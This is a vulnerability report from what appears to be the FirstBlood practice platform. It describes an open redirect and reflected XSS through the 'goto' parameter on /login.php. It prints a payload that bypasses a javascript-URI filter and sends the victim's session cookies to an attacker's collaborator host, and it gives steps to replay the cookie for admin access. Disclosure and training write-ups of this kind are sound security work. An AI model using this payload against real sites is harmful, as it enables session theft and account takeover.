FirstBlood-#432Open Redirect on login page with "goto" parameter leading to account takeover
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-25, xnl-h4ck3r Level 4 reported:

Summary

There is a hidden parameter called goto on /login.php that redirects to another location after login. There is an open redirect vulnerability that allows an attacker to creaft a URL to send to the victim so after they login on the genuine First Blood site, they are redirected to the attackers website, and the auth cookies are also passed to the attackers site. The web application fails to filter the javascript URI upon redirecting

Steps to Reproduce

  1. Go to the link http://firstbloodhackers.com:{PORT}/login.php?goto=j%09avascript:document.location=%27http://{BURP_COLLAB_URL}/%27%2bdocument.cookie
  2. Enter a valid user name and password and click SECURE LOGIN
  3. Observe that the user is taken to the attackers website, and the cookies and their values have been leaked to the attacker:

  1. Clear all cookies and go to the web app again but do not log in.
  2. Add the cookie shows in Step 3 and go to /drpanel/index.php and observe that you are now logged in as admin and view patient data.

Impact

If a victim goes to the web app using this link and logs in, the attacker is able to capture the auth cookies and redirect the user wherever they want. The user may be unaware what has happened, and the attacker can use the cookies to access the doctor management panel as them and view patient PII data.

P3 Medium

Endpoint: /login.php

Parameter: goto

Payload: j%09avascript:document.location=%27http://{BURP_COLLAB_URL}/%27%2bdocument.cookie`


FirstBlood ID: 39
Vulnerability Type: Reflective XSS

Our mistake: The parameter "goto" on login.php should of been "fixed" when redirecting to prevent XSS but due to an oversight from Sean and Karl, the new code did not make it into production. This has since updated since the event ended and you're recommended to re-try. It's related to bug ID 26 because the idea was developers fixed *this* one (when redirecting) but forgot the other reflection.